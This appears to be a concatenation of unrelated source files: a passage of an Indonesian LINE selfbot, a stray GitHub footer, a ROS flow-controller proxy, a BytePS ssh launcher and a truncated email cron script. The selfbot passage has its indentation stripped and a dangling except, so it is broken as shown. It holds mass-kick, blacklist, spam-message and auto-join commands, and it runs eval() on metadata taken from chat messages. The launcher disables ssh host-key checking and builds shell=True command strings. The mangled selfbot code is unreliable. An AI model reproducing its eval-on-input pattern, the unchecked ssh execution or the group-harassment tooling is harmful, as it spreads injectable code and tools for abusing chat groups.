aditmadzs.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectcancel:
protectcancel.remove(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Protect cancel dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect cancel sudah tidak aktif"
aditmadzs.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Protectinvite ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectinvite ','')
if spl == 'on':
if msg.to in protectinvite:
msgs = "Protect invite sudah aktif"
else:
protectinvite.append(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Protect invite diaktifkan\nDi Group : " +str(ginfo.name)
aditmadzs.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectinvite:
protectinvite.remove(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Protect invite dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect invite sudah tidak aktif"
aditmadzs.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Allpro ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Allpro ','')
if spl == 'on':
if msg.to in protectqr:
msgs = ""
else:
protectqr.append(msg.to)
if msg.to in protectkick:
msgs = ""
else:
protectkick.append(msg.to)
if msg.to in protectinvite:
msgs = ""
else:
protectinvite.append(msg.to)
if msg.to in protectjoin:
msgs = ""
else:
protectjoin.append(msg.to)
if msg.to in protectcancel:
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Semua protect sudah on\nDi Group : " +str(ginfo.name)
else:
protectcancel.append(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Berhasil mengaktifkan semua protect\nDi Group : " +str(ginfo.name)
aditmadzs.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
else:
msgs = ""
if msg.to in protectkick:
protectkick.remove(msg.to)
else:
msgs = ""
if msg.to in protectinvite:
protectinvite.remove(msg.to)
else:
msgs = ""
if msg.to in protectjoin:
protectjoin.remove(msg.to)
else:
msgs = ""
if msg.to in protectcancel:
protectcancel.remove(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Berhasil menonaktifkan semua protect\nDi Group : " +str(ginfo.name)
else:
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Semua protect sudah off\nDi Group : " +str(ginfo.name)
aditmadzs.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
#===========KICKOUT============#
elif ("Kick1 " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Bots:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [target])
except:
pass
#===========ADMIN ADD============#
elif ("Adminadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in creator:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
admin[target] = True
f=codecs.open('admin.json','w','utf-8')
json.dump(admin, f, sort_keys=True, indent=4,ensure_ascii=False)
aditmadzs.sendMessage(msg.to,"Berhasil menambahkan admin")
except:
pass
elif ("Staffadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
staff.append(target)
aditmadzs.sendMessage(msg.to,"Berhasil menambahkan staff")
except:
pass
elif ("Botadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
Bots.append(target)
aditmadzs.sendMessage(msg.to,"Berhasil menambahkan bot")
except:
pass
elif ("Admindell " in msg.text):
if msg._from in creator:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del admin[target]
f=codecs.open('admin.json','w','utf-8')
json.dump(admin, f, sort_keys=True, indent=4,ensure_ascii=False)
aditmadzs.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif ("Staffdell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Aditmadzs:
try:
staff.remove(target)
aditmadzs.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif ("Botdell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Aditmadzs:
try:
Bots.remove(target)
aditmadzs.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif cmd == "admin:on" or text.lower() == 'admin:on':
if msg._from in admin:
wait["addadmin"] = True
aditmadzs.sendMessage(msg.to,"Kirim kontaknya...")
elif cmd == "admin:delete" or text.lower() == 'admin:delete':
if msg._from in admin:
wait["delladmin"] = True
aditmadzs.sendMessage(msg.to,"Kirim kontaknya...")
elif cmd == "staff:on" or text.lower() == 'staff:on':
if msg._from in admin:
wait["addstaff"] = True
aditmadzs.sendMessage(msg.to,"Kirim kontaknya...")
elif cmd == "staff:delete" or text.lower() == 'staff:delete':
if msg._from in admin:
wait["dellstaff"] = True
aditmadzs.sendMessage(msg.to,"Kirim kontaknya...")
elif cmd == "bot:on" or text.lower() == 'bot:on':
if msg._from in admin:
wait["addbots"] = True
aditmadzs.sendMessage(msg.to,"Kirim kontaknya...")
elif cmd == "bot:delete" or text.lower() == 'bot:delete':
if msg._from in admin:
wait["dellbots"] = True
aditmadzs.sendMessage(msg.to,"Kirim kontaknya...")
elif cmd == "refresh" or text.lower() == 'refresh':
if msg._from in admin:
wait["addadmin"] = False
wait["delladmin"] = False
wait["addstaff"] = False
wait["dellstaff"] = False
wait["addbots"] = False
wait["dellbots"] = False
wait["wblacklist"] = False
wait["dblacklist"] = False
wait["Talkwblacklist"] = False
wait["Talkdblacklist"] = False
aditmadzs.sendMessage(msg.to,"Berhasil di Refresh...")
elif cmd == "contact admin" or text.lower() == 'contact admin':
ma = ""
for i in admin:
ma = ki.getContact(i)
ki.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "contact staff" or text.lower() == 'contact staff':
ma = ""
for i in staff:
ma = ki.getContact(i)
ki.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "contact bot" or text.lower() == 'contact bot':
ma = ""
for i in Bots:
ma = ki.getContact(i)
ki.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
#===========KOMUT AÇIK KAPALI============#
elif cmd == "notag on" or text.lower() == 'notag on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Mentionkick"] = True
aditmadzs.sendMessage(msg.to,"Notag diaktifkan")
elif cmd == "notag off" or text.lower() == 'notag off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Mentionkick"] = False
aditmadzs.sendMessage(msg.to,"Notag dinonaktifkan")
elif cmd == "contact on" or text.lower() == 'contact on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["contact"] = True
aditmadzs.sendMessage(msg.to,"Deteksi contact diaktifkan")
elif cmd == "contact off" or text.lower() == 'contact off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["contact"] = False
aditmadzs.sendMessage(msg.to,"Deteksi contact dinonaktifkan")
elif cmd == "respon on" or text.lower() == 'respon on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention"] = True
aditmadzs.sendMessage(msg.to,"Auto respon diaktifkan")
elif cmd == "respon off" or text.lower() == 'respon off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention"] = False
aditmadzs.sendMessage(msg.to,"Auto respon dinonaktifkan")
elif cmd == "respongift on" or text.lower() == 'respongift on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Mentiongift"] = True
aditmadzs.sendMessage(msg.to,"Auto respon gift diaktifkan")
elif cmd == "respongift off" or text.lower() == 'respongift off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Mentiongift"] = False
aditmadzs.sendMessage(msg.to,"Auto respon gift dinonaktifkan")
elif cmd == "autojoin on" or text.lower() == 'autojoin on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoin"] = True
aditmadzs.sendMessage(msg.to,"Autojoin diaktifkan")
elif cmd == "autojoin off" or text.lower() == 'autojoin off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoin"] = False
aditmadzs.sendMessage(msg.to,"Autojoin dinonaktifkan")
elif cmd == "autoleave on" or text.lower() == 'autoleave on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoLeave"] = True
aditmadzs.sendMessage(msg.to,"Auto Leave Diaktifkan")
elif cmd == "autoleave off" or text.lower() == 'autoleave off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoLeave"] = False
aditmadzs.sendMessage(msg.to,"Auto Leave Dimatikan")
elif cmd == "autoadd on" or text.lower() == 'autoadd on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoAdd"] = True
aditmadzs.sendMessage(msg.to,"Auto Add Diaktifkan")
elif cmd == "autoadd off" or text.lower() == 'autoadd off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoAdd"] = False
aditmadzs.sendMessage(msg.to,"Auto Add Dimatikan")
elif cmd == "sticker on" or text.lower() == 'sticker on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["sticker"] = True
aditmadzs.sendMessage(msg.to,"Detect Sticker Diaktifkan")
elif cmd == "sticker off" or text.lower() == 'sticker off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["sticker"] = False
aditmadzs.sendMessage(msg.to,"Detect Sticker Dimatikan")
elif cmd == "jointicket on" or text.lower() == 'jointicket on':
if wait["selfbot"] == True:
if msg._from in admin:
settings["autoJoinTicket"] = True
aditmadzs.sendMessage(msg.to,"Auto Join Ticket Diaktifkan")
elif cmd == "jointicket off" or text.lower() == 'jointicket off':
if wait["selfbot"] == True:
if msg._from in admin:
settings["autoJoinTicket"] = False
aditmadzs.sendMessage(msg.to,"Auto Join Ticket Dimatikan")
#===========KOMUT KARA LİSTESİ============#
elif ("Talkban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["Talkblacklist"][target] = True
aditmadzs.sendMessage(msg.to,"Berhasil menambahkan blacklist")
except:
pass
elif ("Untalkban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["Talkblacklist"][target]
aditmadzs.sendMessage(msg.to,"Berhasil menghapus blacklist")
except:
pass
elif cmd == "talkban:on" or text.lower() == 'talkban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Talkwblacklist"] = True
aditmadzs.sendMessage(msg.to,"Kirim kontaknya...")
elif cmd == "untalkban:on" or text.lower() == 'untalkban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Talkdblacklist"] = True
aditmadzs.sendMessage(msg.to,"Kirim kontaknya...")
elif ("Ban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
aditmadzs.sendMessage(msg.to,"Berhasil menambahkan blacklist")
except:
pass
elif ("Unban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["blacklist"][target]
aditmadzs.sendMessage(msg.to,"Berhasil menghapus blacklist")
except:
pass
elif cmd == "ban:on" or text.lower() == 'ban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["wblacklist"] = True
aditmadzs.sendMessage(msg.to,"Kirim kontaknya...")
elif cmd == "unban:on" or text.lower() == 'unban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["dblacklist"] = True
aditmadzs.sendMessage(msg.to,"Kirim kontaknya...")
elif cmd == "banlist" or text.lower() == 'banlist':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
aditmadzs.sendMessage(msg.to,"Tidak ada blacklist")
else:
ma = ""
a = 0
for m_id in wait["blacklist"]:
a = a + 1
end = '\n'
ma += str(a) + ". " +aditmadzs.getContact(m_id).displayName + "\n"
aditmadzs.sendMessage(msg.to,"⏩ Blacklist User\n\n"+ma+"\nTotal「%s」Blacklist User" %(str(len(wait["blacklist"]))))
elif cmd == "talkbanlist" or text.lower() == 'talkbanlist':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["Talkblacklist"] == {}:
aditmadzs.sendMessage(msg.to,"Tidak ada Talkban user")
else:
ma = ""
a = 0
for m_id in wait["Talkblacklist"]:
a = a + 1
end = '\n'
ma += str(a) + ". " +aditmadzs.getContact(m_id).displayName + "\n"
aditmadzs.sendMessage(msg.to,"⏩ Talkban User\n\n"+ma+"\nTotal「%s」Talkban User" %(str(len(wait["Talkblacklist"]))))
elif cmd == "blc" or text.lower() == 'blc':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
aditmadzs.sendMessage(msg.to,"Tidak ada blacklist")
else:
ma = ""
for i in wait["blacklist"]:
ma = aditmadzs.getContact(i)
aditmadzs.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "clearban" or text.lower() == 'clearban':
if wait["selfbot"] == True:
if msg._from in admin:
wait["blacklist"] = {}
ragets = aditmadzs.getContacts(wait["blacklist"])
mc = "���%i」User Blacklist" % len(ragets)
aditmadzs.sendMessage(msg.to,"Sukses membersihkan " +mc)
#===========KOMUT SETİ============#
elif 'Set pesan: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set pesan: ','')
if spl in [""," ","\n",None]:
aditmadzs.sendMessage(msg.to, "Gagal mengganti Pesan Message")
else:
wait["message"] = spl
aditmadzs.sendMessage(msg.to, "「Pesan Msg」\nPesan Message diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set welcome: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set welcome: ','')
if spl in [""," ","\n",None]:
aditmadzs.sendMessage(msg.to, "Gagal mengganti Welcome Message")
else:
wait["welcome"] = spl
aditmadzs.sendMessage(msg.to, "「Welcome Msg」\nWelcome Message diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set leave: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set leave: ','')
if spl in [""," ","\n",None]:
aditmadzs.sendMessage(msg.to, "Gagal mengganti Leave Message")
else:
wait["leave"] = spl
aditmadzs.sendMessage(msg.to, "「Leave Msg」\nLeave Message diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set respon: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set respon: ','')
if spl in [""," ","\n",None]:
aditmadzs.sendMessage(msg.to, "Gagal mengganti Respon Message")
else:
wait["Respontag"] = spl
aditmadzs.sendMessage(msg.to, "「Respon Msg」\nRespon Message diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set spam: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set spam: ','')
if spl in [""," ","\n",None]:
aditmadzs.sendMessage(msg.to, "Gagal mengganti Spam")
else:
Setmain["ADITMADZSmessage1"] = spl
aditmadzs.sendMessage(msg.to, "「Spam Msg」\nSpam Message diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set sider: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set sider: ','')
if spl in [""," ","\n",None]:
aditmadzs.sendMessage(msg.to, "Gagal mengganti Sider Message")
else:
wait["mention"] = spl
aditmadzs.sendMessage(msg.to, "「Sider Msg」\nSider Message diganti jadi :\n\n「{}」".format(str(spl)))
elif text.lower() == "cek pesan":
if msg._from in admin:
aditmadzs.sendMessage(msg.to, "「Pesan Msg」\nPesan Message lu :\n\n「 " + str(wait["message"]) + " 」")
elif text.lower() == "cek welcome":
if msg._from in admin:
aditmadzs.sendMessage(msg.to, "「Welcome Msg」\nWelcome Message lu :\n\n「 " + str(wait["welcome"]) + " 」")
elif text.lower() == "cek leave":
if msg._from in admin:
aditmadzs.sendMessage(msg.to, "「Leave Msg」\nLeave Message lu :\n\n「 " + str(wait["leave"]) + " 」")
elif text.lower() == "cek respon":
if msg._from in admin:
aditmadzs.sendMessage(msg.to, "「Respon Msg」\nRespon Message lu :\n\n「 " + str(wait["Respontag"]) + " 」")
elif text.lower() == "cek spam":
if msg._from in admin:
aditmadzs.sendMessage(msg.to, "「Spam Msg」\nSpam Message lu :\n\n「 " + str(Setmain["ADITMADZSmessage1"]) + " 」")
elif text.lower() == "cek sider":
if msg._from in admin:
aditmadzs.sendMessage(msg.to, "「Sider Msg」\nSider Message lu :\n\n「 " + str(wait["mention"]) + " 」")
#===========BİLETE KATIL============#
elif "/ti/g/" in msg.text.lower():
if wait["selfbot"] == True:
if settings["autoJoinTicket"] == True:
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(text)
n_links = []
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
group = aditmadzs.findGroupByTicket(ticket_id)
aditmadzs.acceptGroupInvitationByTicket(group.id,ticket_id)
aditmadzs.sendMessage(msg.to, "AditmadzsOTW MASUK KE GROUP : %s" % str(group.name))
group1 = ki.findGroupByTicket(ticket_id)
ki.acceptGroupInvitationByTicket(group1.id,ticket_id)
ki.sendMessage(msg.to, "Aditmadzs OTW MASUK KE GROUP : %s" % str(group.name))
except Exception as error:
print (error)
# Main polling loop: fetch up to 50 pending LINE operations per trace and
# dispatch each one to the `bot` handler.
while True:
    try:
        ops = poll.singleTrace(count=50)
        if ops is not None:
            for op in ops:
                # Advance the revision cursor BEFORE handling, so this
                # operation is not re-delivered by the next singleTrace call.
                poll.setRevision(op.revision)
                thread1 = threading.Thread(target=bot, args=(op,))
                #thread1.daemon = True
                thread1.start()
                # NOTE(review): join() immediately after start() makes the
                # dispatch effectively sequential -- the thread adds no
                # concurrency here, only crash isolation for the handler.
                # Confirm that is intended before changing.
                thread1.join()
    except Exception as e:
        # Swallow all polling/handler errors so the loop never dies.
        pass
© 2020 GitHub, Inc.
Terms
Privacy
Security
Status
Help
Contact GitHub
Pricing
API
Training
Blog
About
|
alicat_ros_proxy.py | from __future__ import print_function
import rospy
import threading
import Queue
from alicat_ros.srv import SetFlowRate
from alicat_ros.msg import DeviceSetPoint
class AlicatProxyException(Exception):
    """Raised for errors specific to the Alicat ROS proxy."""
class AlicatProxy(object):
    """Client-side proxy for the ``alicat_set_flow_rate`` ROS service.

    Parameters
    ----------
    namespace : str or None
        Optional ROS namespace prefix for the service name.
    use_thread : bool
        When True (default), set-point calls are made asynchronously from a
        background daemon thread fed by a queue; when False, each call is a
        blocking service call from the caller's thread.
    """

    def __init__(self, namespace=None, use_thread=True):
        self.namespace = namespace
        self.use_thread = use_thread
        self.service_name = 'alicat_set_flow_rate'
        if self.namespace is not None:
            self.service_name = '/{}/{}'.format(self.namespace, self.service_name)
        # Block until the service is advertised so later calls cannot race it.
        rospy.wait_for_service(self.service_name)
        if self.use_thread:
            self.proxy_queue = Queue.Queue()
            self.proxy_thread = threading.Thread(target=self.proxy_target)
            self.proxy_thread.daemon = True
            self.proxy_thread.start()
        else:
            self.set_flow_rate_proxy = rospy.ServiceProxy(self.service_name, SetFlowRate)

    def set_flow_rate(self, set_point_dict):
        """Send flow-rate set points.

        `set_point_dict` maps device address -> flow rate; it is converted to
        a list of DeviceSetPoint messages. Queued (asynchronous) when
        use_thread is True, otherwise a blocking service call.
        """
        set_point_list = [DeviceSetPoint(addr, rate)
                          for addr, rate in set_point_dict.items()]
        if self.use_thread:
            self.proxy_queue.put(set_point_list)
        else:
            rsp = self.set_flow_rate_proxy(set_point_list)

    def proxy_target(self):
        """Worker loop: forward queued set-point lists to the ROS service.

        Bug fix: the original polled with get_nowait() and `continue`d on
        Queue.Empty, busy-waiting and spinning a full CPU core while idle.
        A blocking get() waits efficiently and preserves the same FIFO
        delivery order.
        """
        set_flow_rate_proxy = rospy.ServiceProxy(self.service_name, SetFlowRate)
        while True:
            set_point_list = self.proxy_queue.get()
            rsp = set_flow_rate_proxy(set_point_list)
# Testing
# ---------------------------------------------------------------------------------------
if __name__ == '__main__':
    import time

    def get_set_point_dict(addr, addr_list, value):
        """Return a set-point dict with `value` at `addr` and 0.0 elsewhere."""
        set_point_dict = {}
        for addr_tmp in addr_list:
            if addr_tmp == addr:
                set_point_dict[addr_tmp] = value
            else:
                set_point_dict[addr_tmp] = 0.0
        return set_point_dict

    proxy = AlicatProxy()
    addr_list = ['A', 'B', 'C', 'D', 'E', 'F']
    rate_list = [1.0, 0.0]
    sleep_dt = 5.0

    # Drive each device to each test rate in turn, zeroing all others.
    for i, addr in enumerate(addr_list):
        for rate in rate_list:
            # Fixed typo in the progress message: "settiing" -> "setting".
            print('{}/{}, addr={}: setting flow rate to {}'.format(i + 1, len(addr_list), addr, rate))
            set_point_dict = get_set_point_dict(addr, addr_list, rate)
            proxy.set_flow_rate(set_point_dict)
            time.sleep(sleep_dt)
    print('done')
|
dist_launcher.py | #!/usr/bin/python
"""
Launch a distributed job for BytePS
"""
import argparse
import os, sys
import signal
import logging
import subprocess
from multiprocessing import Pool, Process
from threading import Thread
def preprocess_envs(args_envs):
    """Parse 'KEY:VALUE' strings into a dict; entries without ':' are skipped.

    Only the first ':' separates key from value, so values may themselves
    contain colons.
    """
    envs_map = {}
    for entry in args_envs:
        sep = entry.find(":")
        if sep == -1:
            continue
        envs_map[entry[:sep]] = entry[sep + 1:]
    return envs_map
def get_env(envs_map):
    """Render environment variables as a chain of shell `export` statements.

    Selected variables from the launcher's own environment are forwarded
    first, followed by the caller-supplied `envs_map` entries.
    """
    exports = []
    # Forward performance-related variables from the local environment.
    for key in ('OMP_NUM_THREADS', 'KMP_AFFINITY'):
        value = os.getenv(key)
        if value is not None:
            exports.append('export {}={};'.format(key, value))
    # Then the user/launcher supplied variables.
    exports.extend('export {}={};'.format(k, v) for k, v in envs_map.items())
    return ' '.join(exports)
def get_hosts_from_file(filename):
    """Read a hostfile and return a list of (host, ssh_port) string pairs.

    Blank lines are ignored. Each entry is either 'host' (port defaults to
    "22") or 'host:port'; only the first ':' is treated as the separator.
    The file must contain at least one line.
    """
    with open(filename) as f:
        lines = f.readlines()
    assert len(lines) > 0
    hosts = []
    for line in lines:
        entry = line.strip()
        if not entry:
            continue
        host, sep, port = entry.partition(":")
        hosts.append((host, port if sep else "22"))
    return hosts
def start_ssh(prog, node, port, username, fname):
    """Run shell command `prog` on `node` via ssh, in a background daemon thread.

    The remote command's stdout/stderr are redirected to
    sshlog/<fname>.stdout and sshlog/<fname>.stderr on the remote side, and
    the remote command is backgrounded with '&'. Returns the Thread so the
    caller can join() it.
    """
    def run(prog):
        subprocess.check_call(prog, shell=True)

    dirname = 'sshlog'
    if not os.path.exists(dirname):
        os.mkdir(dirname)
    pname = dirname + '/' + fname
    # Bug fix: the original tested `username is not None`, but submit() passes
    # '' when no --username is given, producing a broken `ssh -l <empty>`
    # command line. Treat empty string the same as None.
    if username:
        prog = 'ssh -o StrictHostKeyChecking=no ' + ' -l ' + username \
               + ' ' + node + ' -p ' + port + ' \'' + prog + '\'' \
               + ' > ' + pname + '.stdout' + ' 2>' + pname + '.stderr&'
    else:
        prog = 'ssh -o StrictHostKeyChecking=no ' + node + ' -p ' + port + ' \'' + prog + '\'' \
               + ' > ' + pname + '.stdout' + ' 2>' + pname + '.stderr&'

    thread = Thread(target=run, args=(prog,))
    # `setDaemon()` is deprecated (since Python 3.10); assign the attribute.
    thread.daemon = True
    thread.start()
    return thread
def submit(args):
    """Launch the BytePS job: one scheduler, N workers, M servers over ssh.

    Reads host lists from the worker/server hostfiles, builds the DMLC_*
    environment for each role, and starts one ssh session per process via
    start_ssh. Blocks until every ssh thread finishes.
    """
    worker_hosts = get_hosts_from_file(args.worker_hostfile)
    server_hosts = get_hosts_from_file(args.server_hostfile)
    num_worker = len(worker_hosts)
    num_server = len(server_hosts)
    assert num_worker >= 1
    assert num_server >= 1
    print('Launch %d workers and %d servers' % (num_worker, num_server))
    # Environment common to every role.
    pass_envs = preprocess_envs(args.env)
    pass_envs['DMLC_NUM_WORKER'] = str(num_worker)
    pass_envs['DMLC_NUM_SERVER'] = str(num_server)
    pass_envs['DMLC_INTERFACE'] = str(args.interface)
    pass_envs['DMLC_PS_ROOT_URI'] = str(args.scheduler_ip)
    pass_envs['DMLC_PS_ROOT_PORT'] = str(args.scheduler_port)
    username = ''
    if args.username is not None:
        username = args.username
    threads = []
    # Scheduler first, then workers, then servers.
    for (node, port) in [(args.scheduler_ip, args.scheduler_ssh_port)]:
        name = 'scheduler'
        pass_envs['DMLC_ROLE'] = name
        prog = get_env(pass_envs) + (' '.join(args.command))
        threads.append(start_ssh(prog, node, port, username, name))
    for i, (node, port) in enumerate(worker_hosts):
        name = 'worker'
        pass_envs['DMLC_ROLE'] = name
        pass_envs['DMLC_WORKER_ID'] = str(i)
        prog = get_env(pass_envs) + (' '.join(args.command))
        threads.append(start_ssh(prog, node, port, username, name + str(i)))
    # NOTE(review): pass_envs is mutated in place, so servers also inherit the
    # last worker's DMLC_WORKER_ID -- presumably harmless, but confirm.
    for i, (node, port) in enumerate(server_hosts):
        name = 'server'
        pass_envs['DMLC_ROLE'] = name
        prog = get_env(pass_envs) + (' '.join(args.command))
        threads.append(start_ssh(prog, node, port, username, name + str(i)))
    # Wait for every ssh wrapper thread (the remote prog itself is backgrounded).
    for t in threads:
        t.join()
def main():
    """Parse command-line arguments and submit the distributed BytePS job."""
    parser = argparse.ArgumentParser(description='Launch a distributed training job for BytePS')
    parser.add_argument('-WH', '--worker-hostfile', required=True, type=str,
                        help = 'the hostfile of worker machines which will run the job.')
    parser.add_argument('-SH', '--server-hostfile', required=True, type=str,
                        help = 'the hostfile of server machines which will run the job.')
    parser.add_argument('--scheduler-ip', required=True, type=str,
                        help = 'the ip address of the scheduler')
    parser.add_argument('--scheduler-port', required=True, type=int,
                        help = 'the port of the scheduler')
    parser.add_argument('--interface', type=str, default='eth0',
                        help = 'the network interface to use')
    parser.add_argument('--env', action='append', default=[],
                        help = 'Given a pair of environment_variable:value, sets this value of \
                        environment variable for all workers and servers. Example OMP_NUM_THREADS:3')
    parser.add_argument('--username', type=str,
                        help = 'the username for ssh')
    parser.add_argument('--scheduler-ssh-port', type=str, default='22',
                        help = 'the ssh port of the scheduler')
    parser.add_argument('command', nargs='+',
                        help = 'command for launching the program')
    args = parser.parse_args()
    # Belt-and-braces re-check of required args before launching anything.
    assert args.worker_hostfile
    assert args.server_hostfile
    assert args.scheduler_ip
    assert args.scheduler_port
    submit(args)
def signal_handler(signal, frame):
    """SIGINT handler: log and terminate the launcher with exit code 0."""
    # NOTE: the `signal` parameter shadows the imported `signal` module inside
    # this function; harmless here because the module is not used in the body.
    logging.info('Stop launcher')
    sys.exit(0)
if __name__ == '__main__':
    # Configure root logging and install a Ctrl-C handler before launching.
    fmt = '%(asctime)s %(levelname)s %(message)s'
    logging.basicConfig(format=fmt, level=logging.INFO)
    signal.signal(signal.SIGINT, signal_handler)
    main()
|
email_cron.py | import threading
import time
import sys
import utils.logs as logs
import time
import os
from utils.sendemail import send_email
from utils.config import get_value
from utils.db import Database_update
try:
from API.scanstatus import scan_status
except Exception as e:
SCRIPT_PATH= os.path.split(os.path.realpath(__file__))[0]
sys.path.append(os.path.join(SCRIPT_PATH,'..','API'))
from scanstatus import scan_status
email_db = Database_update()
emails = send_email()
def send_email_notification():
    """Poll the email collection and mail a notification per completed scan.

    Intended to run forever as the target of a daemon thread; sleeps
    `email_schedule` seconds between polling rounds. Exits the whole process
    if the configured schedule is not a valid integer (or any poll fails).
    """
    # Initial delay: presumably gives the scanner/DB time to start -- TODO confirm.
    time.sleep(20)
    while True:
        try:
            schedule = get_value('config.property','SMTP','email_schedule')
            records = email_db.db.email.find({})
            for data in records:
                notification = data['email_notification']
                scan_id = data['scanid']
                scan_result = scan_status(scan_id)
                if notification == 'N' and scan_result == 'Completed':
                    try:
                        email = data['to_email']
                        email_result = emails.main_email(scan_id,email)
                        if email_result is False:
                            print ("failed to connect to SMTP server")
                            # NOTE(review): this `return` ends the entire
                            # notification thread on a single SMTP failure --
                            # confirm that is intended.
                            return
                        # NOTE(review): this filter matches ANY record whose
                        # email_notification is 'N', not necessarily the record
                        # for `scan_id` -- verify the intended record is updated.
                        email_db.db.email.update({'email_notification' : 'N'},{"$set" : {'email_notification' : 'Y'}})
                    except:
                        pass
            time.sleep(int(schedule))
        except Exception as e:
            logs.logging.info("Invalid email schedule argument "+str(e))
            sys.exit(1)
def email_start_cron():
    """Start the e-mail notification worker thread if enabled in config.

    Reads SMTP/email_notification from config.property; when it is 'y' or
    'Y', launches send_email_notification on a daemon thread so the worker
